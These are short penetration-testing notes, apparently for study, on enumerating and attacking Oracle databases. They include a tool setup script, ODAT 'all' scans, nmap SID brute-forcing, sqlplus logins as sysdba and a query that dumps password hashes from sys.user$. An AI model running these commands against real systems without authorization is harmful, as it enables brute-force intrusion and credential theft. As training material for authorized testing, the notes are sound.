# Setup before we can enumerate the TNS listener and interact with it, we need to download a few packages and tools for our VM. Below is a script that does all of that: ```bash #!/bin/bash sudo apt-get install libaio1 python3-dev alien -y git clone https://github.com/quentinhardy/odat.git cd odat/ git submodule init git submodule update wget https://download.oracle.com/otn_software/linux/instantclient/2112000/instantclient-basic-linux.x64-21.12.0.0.0dbru.zip unzip instantclient-basic-linux.x64-21.12.0.0.0dbru.zip wget https://download.oracle.com/otn_software/linux/instantclient/2112000/instantclient-sqlplus-linux.x64-21.12.0.0.0dbru.zip unzip instantclient-sqlplus-linux.x64-21.12.0.0.0dbru.zip export LD_LIBRARY_PATH=instantclient_21_12:$LD_LIBRARY_PATH export PATH=$LD_LIBRARY_PATH:$PATH pip3 install cx_Oracle sudo apt-get install python3-scapy -y sudo pip3 install colorlog termcolor passlib python-libnmap sudo apt-get install build-essential libgmp-dev -y pip3 install pycryptodome ``` # ODAT ODAT (Oracle Database Attacking Tool) is an open-source penetration testing tool written in Python and designed to enumerate and exploit vulnerabilities in Oracle DBs. ```bash ./odat.py -h ./odat.py all -s <IP> ``` # Nmap - SID Bruteforcing ```bash sudo nmap <IP> -sCV --open -p 1521 --script oracle-sid-brute ``` # SQLplus - Login ```bash sqlplus <user>/<password>@<IP>/XE sqlplus <user>/<password>@<IP>/XE as sysdba SQL> select name, password from sys.user$; ``` If you come across the following error: **sqlplus: error while loading shared libraries: libsqlplus.so: cannot open shared object file: No such file or directory** ```bash sudo sh -c "echo /usr/lib/oracle/12.2/client64/lib > /etc/ld.so.conf.d/oracle-instantclient.conf";sudo ldconfig ```